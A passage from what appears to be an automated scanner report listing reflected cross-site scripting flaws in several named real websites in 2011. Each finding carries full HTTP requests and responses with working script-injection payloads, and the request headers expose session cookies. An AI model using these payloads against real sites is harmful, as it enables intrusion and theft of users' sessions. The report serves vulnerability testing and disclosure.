Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=f15f4987-c68a-413c-8a95-f80937257345; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1305468370; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_71956589444c6f80<script>alert(1)</script>ee62fdbac8({"r":null});

3.4. http://content-interface.iinet.net.au/async/content/browse/westnet/fetchtv [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content-interface.iinet.net.au
Path:   /async/content/browse/westnet/fetchtv

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload c28e6<script>alert(1)</script>0baf0e78e5e was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /async/content/browse/westnet/fetchtv?format=json&jsoncallback=jsonp1305465648404c28e6<script>alert(1)</script>0baf0e78e5e HTTP/1.1
Host: content-interface.iinet.net.au
Proxy-Connection: keep-alive
Referer: http://www.westnet.com.au/fetchtv/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1305465653346; s_pv15=general; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:22:29 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: PHPSESSID=inaroatal6lptet548pajte327; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-Alive
Content-Length: 1152

jsonp1305465648404c28e6<script>alert(1)</script>0baf0e78e5e({"cat_id":"761","cat_parent_id":"760","cat_type_id":"3","cat_title":"Fetchtv","cat_description":"","cat_featured":"0","cat_restricted":"0","cat_published":"1","cat_published_startdate":"2011-04-17 06:
...[SNIP]...

3.5. http://content-interface.iinet.net.au/async/content/play/video/high/5619 [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content-interface.iinet.net.au
Path:   /async/content/play/video/high/5619

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload d0ec8<script>alert(1)</script>0c3f4987c6a was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /async/content/play/video/high/5619?format=json&jsoncallback=jsonp1305465648405d0ec8<script>alert(1)</script>0c3f4987c6a HTTP/1.1
Host: content-interface.iinet.net.au
Proxy-Connection: keep-alive
Referer: http://www.westnet.com.au/fetchtv/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1305465653346; s_pv15=general; s_sq=%5B%5BB%5D%5D; PHPSESSID=nqeto2vvcs77r9ol4m0h4ab533

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:22:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-Alive
Content-Length: 1252

jsonp1305465648405d0ec8<script>alert(1)</script>0c3f4987c6a({"vid_id":"5619","vid_title":"fetchtv Promotional Video","vid_description":"","vid_type":"vod","vid_featured":"0","vid_available":"1","vid_restricted":"0","vid_published":"1","vid_published_startdate"
...[SNIP]...

3.6. http://ds.addthis.com/red/psi/sites/www.eshopfitters.co.uk/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.eshopfitters.co.uk/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 47c0e<script>alert(1)</script>05723e98a27 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.eshopfitters.co.uk/p.json?callback=_ate.ad.hpr47c0e<script>alert(1)</script>05723e98a27&uid=4dce8a530508b02d&url=http%3A%2F%2Fwww.eshopfitters.co.uk%2Frecent_projects.php%3FcPath%3D0&ref=http%3A%2F%2Fwww.eshopfitters.co.uk%2Frecent_projects.php%3FcPath%3D0%26eshopid%3D10pvambtnu2kngg2e8j7hksqo4&nayq8g HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305398109.1FE|1305398109.1OD|1305398109.60|1305398109.1EY; psc=4; uid=4dce8a530508b02d; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 15 May 2011 14:04:46 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 14 Jun 2011 14:04:46 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 15 May 2011 14:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 15 May 2011 14:04:46 GMT
Connection: close

_ate.ad.hpr47c0e<script>alert(1)</script>05723e98a27({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

3.7. http://image.providesupport.com/cmd/chatcisp1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/chatcisp1

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a41fb<script>alert(1)</script>adc6871f1d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmda41fb<script>alert(1)</script>adc6871f1d1/chatcisp1?ps_t=1305465394080&ps_l=http%3A//www.cisp.com/&ps_r=&ps_s=sqa5xksTHqX5 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.cisp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=sqa5xksTHqX5

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:17:00 GMT
Content-Length: 530

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmda41fb<script>alert(1)</script>adc6871f1d1/chatcisp1?ps_t=1305465394080&ps_l=http://www.cisp.com/&ps_r=&ps_s=sqa5xksTHqX5
</pre>
<!-- =
...[SNIP]...

3.8. http://image.providesupport.com/cmd/corecommerce [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/corecommerce

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cfc0e<script>alert(1)</script>4318a75fb08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmdcfc0e<script>alert(1)</script>4318a75fb08/corecommerce?ps_t=1305467817745&ps_l=http%3A//www.corecommerce.com/%3Fgclid%3DCOfz98aO6qgCFQly5Qod3VaGJw&ps_r=&ps_s=sqa5xksTHqX5&amp%3Bps_t=1305467816428 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.corecommerce.com/?gclid=COfz98aO6qgCFQly5Qod3VaGJw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=sqa5xksTHqX5

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:57:32 GMT
Content-Length: 533

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmdcfc0e<script>alert(1)</script>4318a75fb08/corecommerce?ps_t=1305467817745&ps_l=http://www.corecommerce.com/?gclid=COfz98aO6qgCFQly5Qod3VaGJw&ps_r=&ps_s=sqa5xksTHqX5&amp;ps_t=1305467816428
</pre>
...[SNIP]...

3.9. http://image.providesupport.com/js/chatcisp1/safe-monitor.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/chatcisp1/safe-monitor.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ade5c<script>alert(1)</script>67b2701a442 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsade5c<script>alert(1)</script>67b2701a442/chatcisp1/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465392691 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.cisp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:16:39 GMT
Content-Length: 569

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /jsade5c<script>alert(1)</script>67b2701a442/chatcisp1/safe-monitor.js?ps_h=1Otf&ps_t=1305465392691
</pre>
<!-- ==========================
...[SNIP]...

3.10. http://image.providesupport.com/js/chatcisp1/safe-monitor.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/chatcisp1/safe-monitor.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 407ec<a>caf30e524a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/chatcisp1407ec<a>caf30e524a5/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465392691 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.cisp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:16:41 GMT
Content-Length: 551

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/chatcisp1407ec<a>caf30e524a5/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465392691
</pre>
<!-- ============================================
...[SNIP]...

3.11. http://image.providesupport.com/js/corecommerce/safe-standard.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/corecommerce/safe-standard.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47b9a<script>alert(1)</script>c2f4fa10813 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js47b9a<script>alert(1)</script>c2f4fa10813/corecommerce/safe-standard.js?ps_h=XMz2&amp;ps_t=1305467816428 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.corecommerce.com/?gclid=COfz98aO6qgCFQly5Qod3VaGJw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=sqa5xksTHqX5

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:57:25 GMT
Content-Length: 577

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /js47b9a<script>alert(1)</script>c2f4fa10813/corecommerce/safe-standard.js?ps_h=XMz2&amp;ps_t=1305467816428
</pre>
<!-- ==================
...[SNIP]...

3.12. http://image.providesupport.com/js/corecommerce/safe-standard.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/corecommerce/safe-standard.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 393de<a>8964a54983f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/corecommerce393de<a>8964a54983f/safe-standard.js?ps_h=XMz2&amp;ps_t=1305467816428 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.corecommerce.com/?gclid=COfz98aO6qgCFQly5Qod3VaGJw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=sqa5xksTHqX5

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 15 May 2011 13:57:30 GMT
Content-Length: 555

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/corecommerce393de<a>8964a54983f/safe-standard.js?ps_h=XMz2&amp;ps_t=1305467816428
</pre>
<!-- ========================================
...[SNIP]...

3.13. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j2global.tt.omtrdc.net
Path:   /m2/j2global/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 335fa<script>alert(1)</script>14eac9dc13f was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/j2global/mbox/standard?mboxHost=www.new.onebox.com&mboxSession=1305465387100-728648&mboxPage=1305465831614-198194&screenHeight=1200&screenWidth=1920&browserWidth=1020&browserHeight=945&browserTimeOffset=-300&colorDepth=32&mboxCount=1&mbox=OBR_New_Pricing335fa<script>alert(1)</script>14eac9dc13f&mboxId=0&mboxTime=1305447831706&mboxURL=http%3A%2F%2Fwww.new.onebox.com%2Fpricing-receptionist&mboxReferrer=http%3A%2F%2Fwww.new.onebox.com%2Fhome&mboxVersion=39 HTTP/1.1
Host: j2global.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.new.onebox.com/pricing-receptionist
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 211
Date: Sun, 15 May 2011 13:25:44 GMT
Server: Test & Target

mboxFactories.get('default').get('OBR_New_Pricing335fa<script>alert(1)</script>14eac9dc13f',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305465387100-728648.17");

3.14. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload c9469<script>alert(1)</script>497805b5141 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=H05525c9469<script>alert(1)</script>497805b5141&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.vehix.com/?VXSS=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; udm_0=MLvv7iEOIS5n5S4sf9LIKM6Bpt3BQhwXLKhpumJAKH9ZohLvamWO+huyCocJXJDsRczd6FCC/ukv6Xpz1uzdB8jd3W3ILSjdYtnKq3F9jFyZqD377+Us3Nbw7cs1UpXwdejqHoMXde16Mzxvxei7KC+8NBsY8GM6zdRigHER7kUDTsulJ9IyAYcLvyqoyZkQZN5z/aEPrq5n9N0flh2HtuQC41Gxciq7dBDbJX43Xt+nPxvpxIe8OCCnhK5r9ANhaH8LDHQ5aMdNSJp7kYijGTihLVaWzIq5ufydYbNm9P66qBzXsYWmpLYHASVODs5MLGnqaWomJ4kcVVYuRCgplE/8t8hfOuSjORkUuX1twlOccQpK/83a1p6p9gD0Mn657YX8gBmi8+iaxuJ1uHrwDpYm9/xzIaPpzjNK3NRsH9kymE77A07UhIw2q6tBPVlAmPAo+E/4sNqVsTXMtLJrRfea6YQd80ALRcIt+FQ4/eHT1DPQo8qEvpq5YbGrPh1tfrFz62318KfxrC9Xe3bodpJLTOpoy6FPVvvvE/jbr2s6ubXR175Ye9eHk5CyuBojjk2prQ==; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_t9z0="MLs3rF9vsF9nIDEz8lYBG8y1T5yYjdlQKkw4AX/Jd8BMMq7CQ2GtihxyUr10/ojPYcDD+dkjQwqWyPMNJwLxMlQOzBzvptrVk8y3CBYM8B8qXhaXuoc1PqcPHJPJdLwfhziejg4aYNfvU0EE1iSJty6dRJIxPFptrkL3lAGdy/zUX1OQLueuy+BXbF7ZvWdtV4ac1sKxH2JbE/Y="; rsi_us_1000000="pUMdJc2g/wMU1A0vl3aaUfi+Tebh2ccCXOE0KutCzAso9sIeEpxNo+KC9uYJ4XYFFV+IGpm+3PedGzrOT9nTdXqFppriwDzDB8ToLgv7FJ5d7HXtY/2BAO0lNzWre2/fu4lI/6LYaaWHphdnDCHSoBon8iVhd+P2YagLup4Q1rw7bnl+ufxGVphhnMkwic6ljDSPhaVO03NLv9lc8pImscN0rs+Ic9+fZ5vMUDpzxdAZgl37RhVUPwrg8Pw3/xwXJvn9LMHSo09OaE+cZ08DOz1R/F1zZLu+/BVgX+bHNoDJY80lwk0DktY7SW6HhT+JddLG9cyvhIMUv3m0/5WmKlgf6gvbnEFu9Scbfu/CvA3O1t8qEGvqPzazmBh2Mc8TRLI13m/VszY5+UWBP4kc0Mg7Du4txgE/zEjh5+3+VgN7zvSoi6LMLm0qEKtDxsSJTwm9d0AXpCQEiSgVnWE7bRfLHF2eOdIpJgFpr9ItAQscxBV1b99hoDzj6Tm6PwkI+qSaU8KizqVJjGam82pRL8/FHvCbqbeJJZ5/wM/37qL/XPQ/cdwHBBKAX6++SRrPH7ZP7DBalGIVhKvaE+wbmALN2AzxvqTEjU9nejP//BIV4v/wfdMvzr2ZHBDJS1dA+HSyR4yLAdaZjS6hx+DD0rNIPOL+0/6l7ZPk4nKmqyHMe0La+xOQSizrDbXxz0+BS+jX7Po518hwJnRcvsORFVs/mKEUyZc7HlTMwrlrTeq3Arl/zrdd8Wo="; rtc_B6lA=MLuBU4kHAVhDF1LCdcKXDzQFlw1IZ8BYwogNsnhBUGsfVkhkAPoI68+Xd8YLhw8U09tff4uBLKooVnFpj3ggkQ==; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtlR8qmZ5EYm2QQMyGpObby6k1VtDsXg7sk5WAKTYPpgxBsJGyT/YmPwZWTFxu/fSGzXIpsZZc8j0XeTXtRfm8Gw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 15 May 2011 13:19:09 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 16 May 2011 13:19:09 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 15 May 2011 13:19:09 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "H05525C9469<SCRIPT>ALERT(1)</SCRIPT>497805B5141" was not recognized.
*/

3.15. http://mods4rides.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mods4rides.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb6e"><script>alert(1)</script>40d92ee4d7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7bb6e\"><script>alert(1)</script>40d92ee4d7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7bb6e"><script>alert(1)</script>40d92ee4d7c=1 HTTP/1.1
Host: mods4rides.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,43691
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:01:35 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ruby/1.2.6 Ruby/1.8.7(2008-08-11) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Set-Cookie: cookie_test=please_accept_for_session; expires=Tue, 14-Jun-2011 14:01:35 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 38839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<meta h
...[SNIP]...
<a href="index.php?7bb6e\"><script>alert(1)</script>40d92ee4d7c=1&Make=all&Model=all&Year=0">
...[SNIP]...

3.16. http://onebox.extole.com/offers/23073174/share [extra_url_query_string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onebox.extole.com
Path:   /offers/23073174/share

Issue detail

The value of the extra_url_query_string request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5af9f"><script>alert(1)</script>72a5800a358 was submitted in the extra_url_query_string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /offers/23073174/share?extra_url_query_string=706c69643d3832343134313339395af9f"><script>alert(1)</script>72a5800a358 HTTP/1.1
Host: onebox.extole.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _dominus_pid%3A23073174=BAgiDjgyNDE0MTM5OQ%3D%3D--8e2b080a34253b88d9d0fc37d226375f2d43d303; _dominus_token=1a1831e3bdc5a45c926fca7607d04f8af00dd39c

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sun, 15 May 2011 13:24:29 GMT
ETag: "e7621760ce681ce5d446c7add907b2c1"
Server: nginx/0.7.65
Set-Cookie: _dominus_consumer=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _dominus_session=BAh7BzoQX2NzcmZfdG9rZW4iMUFlNzRRZDlkd3dqUHpqYjFWU0hETFovdWNUTGNPZE9DdENHOTZiL0dnNUk9Og9zZXNzaW9uX2lkIiU3ODZhNDIzMzkxMmQ5YzBjODY5ZDIyM2M1MjUxZWU2Yg%3D%3D--867ac15d0b9d131d77d8ef999a06598bf8cbde55; path=/; HttpOnly
Status: 200 OK
X-Bicyclette-Version: 4eccbe41b71d565e704d3bb4e3fb92e57ac165b5
X-Runtime: 55
Connection: keep-alive
Content-Length: 26380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="hidden" name="extra_url_query_string" value="706c69643d3832343134313339395af9f"><script>alert(1)</script>72a5800a358" />
...[SNIP]...

3.17. http://pixel.fetchback.com/serve/fb/pdc [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 198d5<x%20style%3dx%3aexpression(alert(1))>5b0a294aec3 was submitted in the name parameter. This input was echoed as 198d5<x style=x:expression(alert(1))>5b0a294aec3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing198d5<x%20style%3dx%3aexpression(alert(1))>5b0a294aec3&sid=1888 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.new.onebox.com/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: uid=1_1305465399_1305465399580:3638810180517586; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
